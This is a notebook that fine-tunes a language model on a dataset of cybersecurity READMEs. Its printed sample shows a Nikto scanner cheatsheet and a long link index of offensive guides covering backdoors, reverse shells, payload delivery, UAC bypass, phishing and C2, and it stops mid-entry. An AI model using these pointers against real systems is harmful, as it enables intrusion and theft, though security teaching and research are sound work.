If you're opening this Notebook on colab, you will probably need to install 🤗 Transformers and 🤗 Datasets. Uncomment the following cell and run it.

In [1]:
!pip install datasets
!pip install transformers
!pip install accelerate -U
# Transformers installation
# To install from source instead of the last release, comment the command above and uncomment the following one.
! pip install git+https://github.com/huggingface/transformers.git

Collecting git+https://github.com/huggingface/transformers.git
  Cloning https://github.com/huggingface/transformers.git to /tmp/pip-req-build-8qt_lse5
  Running command git clone --filter=blob:none --quiet https://github.com/huggingface/transformers.git /tmp/pip-req-build-8qt_lse5
  Resolved https://github.com/huggingface/transformers.git to commit b109257f4fb8b1166e7c53cc5418632014ed53a5
  Installing build dependencies ... [?25l[?25hdone
  Getting requirements to build wheel ... [?25l[?25hdone
  Preparing metadata (pyproject.toml) ... [?25l[?25hdone


If you're opening this notebook locally, make sure your environment has an install from the last version of those libraries.

To be able to share your model with the community and generate results like the one shown in the picture below via the inference API, there are a few more steps to follow.

First you have to store your authentication token from the Hugging Face website (sign up [here](https://huggingface.co/join) if you haven't already!) then execute the following cell and input your username and password:

In [2]:
from huggingface_hub import notebook_login

notebook_login()

VBox(children=(HTML(value='<center> <img\nsrc=https://huggingface.co/front/assets/huggingface_logo-noborder.sv…

Then you need to install Git-LFS. Uncomment the following instructions:

In [3]:
!apt install git-lfs

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
git-lfs is already the newest version (3.0.2-1ubuntu0.2).
0 upgraded, 0 newly installed, 0 to remove and 45 not upgraded.


Make sure your version of Transformers is at least 4.11.0 since the functionality was introduced in that version:

In [4]:
import transformers

print(transformers.__version__)

4.40.0.dev0


You can find a script version of this notebook to fine-tune your model in a distributed fashion using multiple GPUs or TPUs [here](https://github.com/huggingface/transformers/tree/master/examples/language-modeling).

We also quickly upload some telemetry - this tells us which examples and software versions are getting used so we know where to prioritize our maintenance efforts. We don't collect (or care about) any personally identifiable information, but if you'd prefer not to be counted, feel free to skip this step or delete this cell entirely.

In [5]:
from transformers.utils import send_example_telemetry

send_example_telemetry("language_modeling_notebook", framework="pytorch")

# Fine-tuning a language model

In this notebook, we'll see how to fine-tune one of the [🤗 Transformers](https://github.com/huggingface/transformers) model on a language modeling tasks. We will cover two types of language modeling tasks which are:

- Causal language modeling: the model has to predict the next token in the sentence (so the labels are the same as the inputs shifted to the right). To make sure the model does not cheat, it gets an attention mask that will prevent it to access the tokens after token i when trying to predict the token i+1 in the sentence.

![Widget inference representing the causal language modeling task](images/causal_language_modeling.png)

- Masked language modeling: the model has to predict some tokens that are masked in the input. It still has access to the whole sentence, so it can use the tokens before and after the tokens masked to predict their value.

![Widget inference representing the masked language modeling task](images/masked_language_modeling.png)

We will see how to easily load and preprocess the dataset for each one of those tasks, and how to use the `Trainer` API to fine-tune a model on it.

A script version of this notebook you can directly run on a distributed environment or on TPU is available in our [examples folder](https://github.com/huggingface/transformers/tree/master/examples).

## Preparing the dataset

For each of those tasks, we will use the [CyberNative]() dataset as an example. You can load it very easily with the 🤗 Datasets library.

In [6]:
from datasets import load_dataset
dataset = load_dataset("CyberNative/github_cybersecurity_READMEs")

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


You can replace the dataset above with any dataset hosted on [the hub](https://huggingface.co/datasets) or use your own files. Just uncomment the following cell and replace the paths with values that will lead to your files:

In [7]:
dataset["train"] = load_dataset("CyberNative/github_cybersecurity_READMEs", split='train[:80%]')
dataset["validation"] = load_dataset("CyberNative/github_cybersecurity_READMEs", split='train[80%:90%]')
dataset["test"] = load_dataset("CyberNative/github_cybersecurity_READMEs", split='train[90%:]')

You can also load datasets from a csv or a JSON file, see the [full documentation](https://huggingface.co/docs/datasets/loading_datasets.html#from-local-files) for more information.

To access an actual element, you need to select a split first, then give an index:

In [8]:
dataset["train"][10]



To get a sense of what the data looks like, the following function will show some examples picked randomly in the dataset.

In [9]:
from datasets import ClassLabel
import random
import pandas as pd
from IPython.display import display, HTML

def show_random_elements(dataset, num_examples=10):
    assert num_examples <= len(dataset), "Can't pick more elements than there are in the dataset."
    picks = []
    for _ in range(num_examples):
        pick = random.randint(0, len(dataset)-1)
        while pick in picks:
            pick = random.randint(0, len(dataset)-1)
        picks.append(pick)

    df = pd.DataFrame(dataset[picks])
    for column, typ in dataset.features.items():
        if isinstance(typ, ClassLabel):
            df[column] = df[column].transform(lambda i: typ.names[i])
    display(HTML(df.to_html()))

In [10]:
show_random_elements(dataset["train"])

Unnamed: 0,text
0,"## Description\n**Nikto** is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.\n\nNikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).\n\nNot every check is a security problem. There are some items that are ""info only"" type checks that look for things that may not have a security flaw, but Pentester may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.\n\nThe goal of the project is to examine a web server to find potential problems and security vulnerabilities, including:\n\n- Server and software misconfigurations\n- Default files and programs\n- Insecure files and programs\n- Outdated servers and programs\n- Pointers to lead a human tester to better manual testing\n\nNikto is built on LibWhisker2 (by Rain Forest Puppy) and can run on any platform which has a Perl environment. It supports SSL, proxies, host authentication, attack encoding and more.\n\n## Cheatsheet\n\n### To scan a particular host\n```\ndocker run -it --rm secsi/nikto -host <target_ip_address>\n```\n\n### To scan a host on multiple ports (default = 80)\n```\ndocker run -it --rm secsi/nikto -host <target_ip_address> -port [port number 1], [port number 2], [port number 3]\n```\n\n### To scan a host and output fingerprinted information to a file\n```\ndocker run -it --rm -v <output_dir>:/output secsi/nikto -host <target_ip_address> -output /output/<output_file>\n```\n\n### To use a proxy while scanning a host\n```\ndocker run -it --rm secsi/nikto -host <target_ip_address> -useproxy <proxy_address>\n```"
1,"# PENTESTING-BIBLE\n# WAYBACK MACHINE FOR HACKING ARTICLES ALL THE SCREENSHOTS IS AS PDF\n\n# hundreds of ethical hacking &amp; penetration testing &amp; red team &amp; cyber security &amp; computer science resources.\n# MORE THAN 2000 LINKS.\n# MORE THAN 2000 PDF FILES ABOUT DIFFERENT FIELDS OF HACKING .\n# note:most of the pdf files is different than the links which means there is now almost 4000 links & pdf files. \n\n# Created By Ammar Amer (Twitter @cry__pto)\n\n## Support.\n\n\n*Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker)\n\n\n-1- 3 Ways Extract Password Hashes from NTDS.dit:\n\n\nhttps://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit\n\n\n-2- 3 ways to Capture HTTP Password in Network PC:\n\n\nhttps://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/\n\n\n-3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty:\n\n\nwww.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/\n\n\n-4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection:\n\n\nhttps://medium.com/p/2e143eb36941\n\n\n-5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality:\n\n\nhttps://medium.com/p/a11bb5f863b3/share/twitter\n\n\n-6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company:\n\n\nhttps://medium.com/p/a69afe5a0899\n\n\n-7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company:\n\n\nhttps://medium.com/p/e51a945b083d\n\n\n-8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation:\n\n\nhttps://medium.com/p/b29355a8e68e\n\n\n-9-Recon — my way:\n\n\nhttps://medium.com/p/82b7e5f62e21\n\n\n-10-Reconnaissance: a eulogy in three acts:\n\n\nhttps://medium.com/p/7840824b9ef2\n\n\n-11-Red-Teaming-Toolkit:\n\n\nhttps://github.com/infosecn1nja/Red-Teaming-Toolkit\n\n\n-12-Red Team Tips:\n\n\nhttps://vincentyiu.co.uk/\n\n\n-13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL:\n\n\nhttps://modexp.wordpress.com/2019/04/24/glibc-shellcode/\n\n\n-14-Shellcode: Encrypting traffic:\n\n\nhttps://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/\n\n\n-15-Penetration Testing of an FTP Server:\n\n\nhttps://medium.com/p/19afe538be4b\n\n\n-16-Reverse Engineering of the Anubis Malware — Part 1:\n\n\nhttps://medium.com/p/741e12f5a6bd\n\n\n-17-Privilege Escalation on Linux with Live examples:\n\n\nhttps://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/\n\n\n-18-Pentesting Cheatsheets:\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets\n\n\n-19-Powershell Payload Delivery via DNS using Invoke-PowerCloud:\n\n\nhttps://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud\n\n\n-20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS:\n\n\nhttps://sguru.org/ghdb-download-list-4500-google-dorks-free/\n\n\n-21-SQL Injection Cheat Sheet:\n\n\nhttps://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/\n\n\n-22-SQLmap’s os-shell + Backdooring website with Weevely:\n\n\nhttps://medium.com/p/8cb6dcf17fa4\n\n\n-23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips:\n\n\nhttps://medium.com/p/c5a3f5764cb3\n\n\n-24-Top 10 Essential NMAP Scripts for Web App Hacking:\n\n\nhttps://medium.com/p/c7829ff5ab7\n\n\n-25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!:\n\n\nhttps://medium.com/p/52cf5c5640a1\n\n\n-26-Re ected XSS Bypass Filter:\n\n\nhttps://medium.com/p/de41d35239a3\n\n\n-27-XSS Payloads, getting past alert(1):\n\n\nhttps://medium.com/p/217ab6c6ead7\n\n\n-28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical:\n\n\nhttps://medium.com/p/50d8135b7549\n\n\n-29-Web Application Firewall (WAF) Evasion Techniques:\n\n\nhttps://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques\n\n\n-30-OSINT Resources for 2019:\n\n\nhttps://medium.com/p/b15d55187c3f\n\n\n-31-The OSINT Toolkit:\n\n\nhttps://medium.com/p/3b9233d1cdf9\n\n\n-32-OSINT : Chasing Malware + C&C Servers:\n\n\nhttps://medium.com/p/3c893dc1e8cb\n\n\n-33-OSINT tool for visualizing relationships between domains, IPs and email addresses:\n\n\nhttps://medium.com/p/94377aa1f20a\n\n\n-34-From OSINT to Internal – Gaining Access from outside the perimeter:\n\n\nhttps://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter\n\n\n-35-Week in OSINT #2018–35:\n\n\nhttps://medium.com/p/b2ab1765157b\n\n\n-36-Week in OSINT #2019–14:\n\n\nhttps://medium.com/p/df83f5b334b4\n\n\n-37-Instagram OSINT | What A Nice Picture:\n\n\nhttps://medium.com/p/8f4c7edfbcc6\n\n\n-38-awesome-osint:\n\n\nhttps://github.com/jivoi/awesome-osint\n\n\n-39-OSINT_Team_Links:\n\n\nhttps://github.com/IVMachiavelli/OSINT_Team_Links\n\n\n-40-Open-Source Intelligence (OSINT) Reconnaissance:\n\n\nhttps://medium.com/p/75edd7f7dada\n\n\n-41-Hacking Cryptocurrency Miners with OSINT Techniques:\n\n\nhttps://medium.com/p/677bbb3e0157\n\n\n-42-A penetration tester’s guide to sub- domain enumeration:\n\n\nhttps://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5\n\n\n-43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages:\n\n\nhttps://blackarch.org/recon.html\n\n\n-44-What tools I use for my recon during BugBounty:\n\n\nhttps://medium.com/p/ec25f7f12e6d\n\n\n-45-Command and Control – DNS:\n\n\nhttps://pentestlab.blog/2017/09/06/command-and-control-dns/\n\n\n-46-Command and Control – WebDAV:\n\n\nhttps://pentestlab.blog/2017/09/12/command-and-control-webdav/\n\n\n\n\n-47-Command and Control – Twitter:\n\n\nhttps://pentestlab.blog/2017/09/26/command-and-control-twitter/\n\n\n-48-Command and Control – Kernel:\n\n\nhttps://pentestlab.blog/2017/10/02/command-and-control-kernel/\n\n\n-49-Source code disclosure via exposed .git folder:\n\n\nhttps://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html\n\n\n-50-Pentesting Cheatsheet:\n\n\nhttps://hausec.com/pentesting-cheatsheet/\n\n\n\n-51-Windows Userland Persistence Fundamentals:\n\n\nhttps://www.fuzzysecurity.com/tutorials/19.html\n\n\n-52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up:\n\n\nhttps://medium.com/p/abdc7c269dd5\n\n\n-53-awesome-bug-bounty:\n\n\nhttps://github.com/djadmin/awesome-bug-bounty\n\n\n-54-dostoevsky-pentest-notes:\n\n\nhttps://github.com/dostoevskylabs/dostoevsky-pentest-notes\n\n\n-55-awesome-pentest:\n\n\nhttps://github.com/enaqx/awesome-pentest\n\n\n-56-awesome-windows-exploitation:\n\n\nhttps://github.com/enddo/awesome-windows-exploitation\n\n\n-57-awesome-exploit-development:\n\n\nhttps://github.com/FabioBaroni/awesome-exploit-development\n\n\n\n-58-BurpSuit + SqlMap = One Love:\n\n\nhttps://medium.com/p/64451eb7b1e8\n\n\n-59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat:\n\n\nhttps://medium.com/p/a5a5d3ffea46\n\n\n-60-DLL Injection:\n\n\nhttps://pentestlab.blog/2017/04/04/dll-injection\n\n\n-61-DLL Hijacking:\n\n\nhttps://pentestlab.blog/2017/03/27/dll-hijacking\n\n\n-62-My Recon Process — DNS Enumeration:\n\n\nhttps://medium.com/p/d0e288f81a8a\n\n\n-63-Google Dorks for nding Emails, Admin users etc:\n\n\nhttps://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc\n\n\n-64-Google Dorks List 2018:\n\n\nhttps://medium.com/p/fb70d0cbc94\n\n\n-65-Hack your own NMAP with a BASH one-liner:\n\n\nhttps://medium.com/p/758352f9aece\n\n\n-66-UNIX / LINUX CHEAT SHEET:\n\n\ncheatsheetworld.com/programming/unix-linux-cheat-sheet/\n\n\n-67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced:\n\n\nhttps://medium.com/p/74d2bec02099\n\n\n-68- information gathering:\n\n\nhttps://pentestlab.blog/category/information-gathering/\n\n\n-69-post exploitation:\n\n\nhttps://pentestlab.blog/category/post-exploitation/\n\n\n\n-70-privilege escalation:\n\n\nhttps://pentestlab.blog/category/privilege-escalation/\n\n\n-71-red team:\n\n\nhttps://pentestlab.blog/category/red-team/\n\n\n-72-The Ultimate Penetration Testing Command Cheat Sheet for Linux:\n\n\nhttps://www.hackingloops.com/command-cheat-sheet-for-linux/\n\n\n-73-Web Application Penetration Testing Cheat Sheet:\n\n\nhttps://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/\n\n\n-74-Windows Kernel Exploits:\n\n\nhttps://pentestlab.blog/2017/04/24/windows-kernel-exploits\n\n\n-75-Windows oneliners to download remote payload and execute arbitrary code:\n\n\nhttps://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/\n\n\n-76-Windows-Post-Exploitation:\n\n\nhttps://github.com/emilyanncr/Windows-Post-Exploitation\n\n\n-77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows:\n\n\nhttps://medium.com/p/a2ddc3557403\n\n\n-78-Windows Privilege Escalation Fundamentals:\n\n\nhttps://www.fuzzysecurity.com/tutorials/16.html\n\n\n-79-Windows Privilege Escalation Guide:\n\nwww.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\n\n\n\n-80-Windows Active Directory Post Exploitation Cheatsheet:\n\n\nhttps://medium.com/p/48c2bd70388\n\n\n-81-Windows Exploitation Tricks: Abusing the User-Mode Debugger:\n\n\nhttps://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html\n\n\n-82-VNC Penetration Testing (Port 5901):\n\n\nhttp://www.hackingarticles.in/vnc-penetration-testing\n\n\n-83- Big List Of Google Dorks Hacking:\n\n\nhttps://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking\n\n\n-84-List of google dorks for sql injection:\n\n\nhttps://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/\n\n\n-85-Download Google Dorks List 2019:\n\n\nhttps://medium.com/p/323c8067502c\n\n\n-86-Comprehensive Guide to Sqlmap (Target Options):\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2\n\n\n-87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE:\n\n\nwww.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple\n\n\n-88-Comprehensive Guide on Gobuster Tool:\n\n\nhttps://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/\n\n\n-89-My Top 5 Web Hacking Tools:\n\n\nhttps://medium.com/p/e15b3c1f21e8\n\n\n-90-[technical] Pen-testing resources:\n\n\nhttps://medium.com/p/cd01de9036ad\n\n\n-91-File System Access on Webserver using Sqlmap:\n\n\nhttp://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap\n\n\n-92-kali-linux-cheatsheet:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-93-Pentesting Cheatsheet:\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n\n-94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd):\n\n\nhttp://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa\n\n\n-95-XSS Payload List - Cross Site Scripting Vulnerability Payload List:\n\n\nhttps://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html\n\n\n-96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection:\n\n\nhttps://www.notsosecure.com/analyzing-cve-2018-6376/\n\n\n-97-Exploiting Sql Injection with Nmap and Sqlmap:\n\n\nhttp://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap\n\n\n-98-awesome-malware-analysis:\n\n\nhttps://github.com/rshipp/awesome-malware-analysis\n\n\n-99-Anatomy of UAC Attacks:\n\n\nhttps://www.fuzzysecurity.com/tutorials/27.html\n\n\n-100-awesome-cyber-skills:\n\n\nhttps://github.com/joe-shenouda/awesome-cyber-skills\n\n\n-101-5 ways to Banner Grabbing:\n\n\nhttp://www.hackingarticles.in/5-ways-banner-grabbing\n\n\n-102-6 Ways to Hack PostgresSQL Login:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-postgressql-login\n\n\n-103-6 Ways to Hack SSH Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-ssh-login-password\n\n\n-104-10 Free Ways to Find Someone’s Email Address:\n\n\nhttps://medium.com/p/e6f37f5fe10a\n\n\n-105-USING A SCF FILE TO GATHER HASHES:\n\n\nhttps://1337red.wordpress.com/using-a-scf-file-to-gather-hashes\n\n\n-106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit):\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit\n\n\n107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities\n\n\n-108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs):\n\n\nhttps://medium.com/p/ef6542301c65\n\n\n-109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information:\n\n\nhttps://gbhackers.com/external-black-box-penetration-testing\n\n\n-110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals:\n\n\nhttps://gbhackers.com/hacking-tools-list\n\n\n-111-Most Important Considerations with Malware Analysis Cheats And Tools list:\n\n\nhttps://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list\n\n\n-112-Awesome-Hacking:\n\n\nhttps://github.com/Hack-with-Github/Awesome-Hacking\n\n\n-113-awesome-threat-intelligence:\n\n\nhttps://github.com/hslatman/awesome-threat-intelligence\n\n\n-114-awesome-yara:\n\n\nhttps://github.com/InQuest/awesome-yara\n\n\n-115-Red-Team-Infrastructure-Wiki:\n\n\nhttps://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki\n\n\n-116-awesome-pentest:\n\n\nhttps://github.com/enaqx/awesome-pentest\n\n\n-117-awesome-cyber-skills:\n\n\nhttps://github.com/joe-shenouda/awesome-cyber-skills\n\n\n-118-pentest-wiki:\n\n\nhttps://github.com/nixawk/pentest-wiki\n\n\n-119-awesome-web-security:\n\n\nhttps://github.com/qazbnm456/awesome-web-security\n\n\n-120-Infosec_Reference:\n\n\nhttps://github.com/rmusser01/Infosec_Reference\n\n\n-121-awesome-iocs:\n\n\nhttps://github.com/sroberts/awesome-iocs\n\n\n-122-blackhat-arsenal-tools:\n\n\nhttps://github.com/toolswatch/blackhat-arsenal-tools\n\n\n-123-awesome-social-engineering:\n\n\nhttps://github.com/v2-dev/awesome-social-engineering\n\n\n-124-Penetration Testing Framework 0.59:\n\n\nwww.vulnerabilityassessment.co.uk/Penetration%20Test.html\n\n\n-125-Penetration Testing Tools Cheat Sheet :\n\n\nhttps://highon.coffee/blog/penetration-testing-tools-cheat-sheet/\n\n\n-126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool:\n\n\nhttps://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool\n\n\n\n-127-Spear Phishing 101:\n\n\nhttps://blog.inspired-sec.com/archive/2017/05/07/Phishing.html\n\n\n-128-100 ways to discover (part 1):\n\n\nhttps://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/\n\n\n-129-Comprehensive Guide to SSH Tunnelling:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/\n\n\n-130-Capture VNC Session of Remote PC using SetToolkit:\n\n\nhttp://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/\n\n\n-131-Hack Remote PC using PSEXEC Injection in SET Toolkit:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/\n\n\n\n\n-132-Denial of Service Attack on Network PC using SET Toolkit:\n\n\nhttp://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/\n\n\n\n-133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit:\n\n\nhttp://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/\n\n\n-134-Hack Any Android Phone with DroidJack (Beginner’s Guide):\n\n\nhttp://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/\n\n\n-135-HTTP RAT Tutorial for Beginners:\n\n\nhttp://www.hackingarticles.in/http-rat-tutorial-beginners/\n\n\n-136-5 ways to Create Permanent Backdoor in Remote PC:\n\n\nhttp://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/\n\n\n-137-How to Enable and Monitor Firewall Log in Windows PC:\n\n\nhttp://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/\n\n\n-138-EMPIRE TIPS AND TRICKS:\n\n\nhttps://enigma0x3.net/2015/08/26/empire-tips-and-tricks/\n\n\n-139-CSRF account takeover Explained Automated/Manual:\n\n\nhttps://medium.com/p/447e4b96485b\n\n\n-140-CSRF Exploitation using XSS:\n\n\nhttp://www.hackingarticles.in/csrf-exploitation-using-xss\n\n\n-141-Dumping Domain Password Hashes:\n\n\nhttps://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\n\n\n-142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough:\n\n\nhttps://bneg.io/2017/05/24/empire-post-exploitation/\n\n\n-143-Dropbox for the Empire:\n\n\nhttps://bneg.io/2017/05/13/dropbox-for-the-empire/\n\n\n-144-Empire without PowerShell.exe:\n\n\nhttps://bneg.io/2017/07/26/empire-without-powershell-exe/\n\n\n-145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION:\n\n\nhttps://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/\n\n\n-146-PHISHING WITH EMPIRE:\n\n\nhttps://enigma0x3.net/2016/03/15/phishing-with-empire/\n\n\n-146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP:\n\n\nhttps://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n\n\n-147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING:\n\n\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n\n\n-148-“FILELESS” UAC BYPASS USING SDCLT.EXE:\n\n\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n\n\n-149-PHISHING AGAINST PROTECTED VIEW:\n\n\nhttps://enigma0x3.net/2017/07/13/phishing-against-protected-view/\n\n\n-150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM:\n\n\nhttps://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/\n\n\n-151-enum4linux Cheat Sheet:\n\n\nhttps://highon.coffee/blog/enum4linux-cheat-sheet/\n\n\n-152-enumeration:\n\n\nhttps://technologyredefine.blogspot.com/2017/11/enumeration.html\n\n\n-153-Command and Control – WebSocket:\n\n\nhttps://pentestlab.blog/2017/12/06/command-and-control-websocket\n\n\n-154-Command and Control – WMI:\n\nhttps://pentestlab.blog/2017/11/20/command-and-control-wmi\n\n\n-155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:\n\n\nhttp://thelearninghacking.com/create-virus-hack-windows/\n\n\n-156-Comprehensive Guide to Nmap Port Status:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-nmap-port-status\n\n\n-157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool:\n\n\nhttps://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool\n\n\n-158-Compromising Jenkins and extracting credentials:\n\n\nhttps://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/\n\n\n-159-footprinting:\n\n\nhttps://technologyredefine.blogspot.com/2017/09/footprinting_17.html\n\n\n-160-awesome-industrial-control-system-security:\n\n\nhttps://github.com/hslatman/awesome-industrial-control-system-security\n\n\n-161-xss-payload-list:\n\n\nhttps://github.com/ismailtasdelen/xss-payload-list\n\n\n-162-awesome-vehicle-security:\n\nhttps://github.com/jaredthecoder/awesome-vehicle-security\n\n\n-163-awesome-osint:\n\n\nhttps://github.com/jivoi/awesome-osint\n\n\n-164-awesome-python:\n\n\nhttps://github.com/vinta/awesome-python\n\n\n-165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit):\n\n\nhttps://www.exploit-db.com/download/44830.rb\n\n\n-166-nbtscan Cheat Sheet:\n\n\nhttps://highon.coffee/blog/nbtscan-cheat-sheet/\n\n\n-167-neat-tricks-to-bypass-csrfprotection:\n\n\nwww.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection\n\n\n-168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2:\n\n\nhttps://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/\n\n\n-169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts):\n\n\nhttps://medium.com/p/868a7bd7f692\n\n\n-170-Nmap Cheat Sheet:\n\nhttps://highon.coffee/blog/nmap-cheat-sheet/\n\n\n-171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV:\n\n\nhttps://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/\n\n\n-172-Phishing with PowerPoint:\n\n\nhttps://www.blackhillsinfosec.com/phishing-with-powerpoint/\n\n\n-173-hide-payload-ms-office-document-properties:\n\n\nhttps://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/\n\n\n-174-How to Evade Application Whitelisting Using REGSVR32:\n\n\nhttps://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/\n\n\n-175-How to Build a C2 Infrastructure with Digital Ocean – Part 1:\n\n\nhttps://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/\n\n\n-176-WordPress Penetration Testing using Symposium Plugin SQL Injection:\n\n\nhttp://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection\n\n\n-177-Manual SQL Injection Exploitation Step by Step:\n\n\nhttp://www.hackingarticles.in/manual-sql-injection-exploitation-step-step\n\n\n-178-MSSQL Penetration Testing with Metasploit:\n\n\nhttp://www.hackingarticles.in/mssql-penetration-testing-metasploit\n\n\n-179-Multiple Ways to Get root through Writable 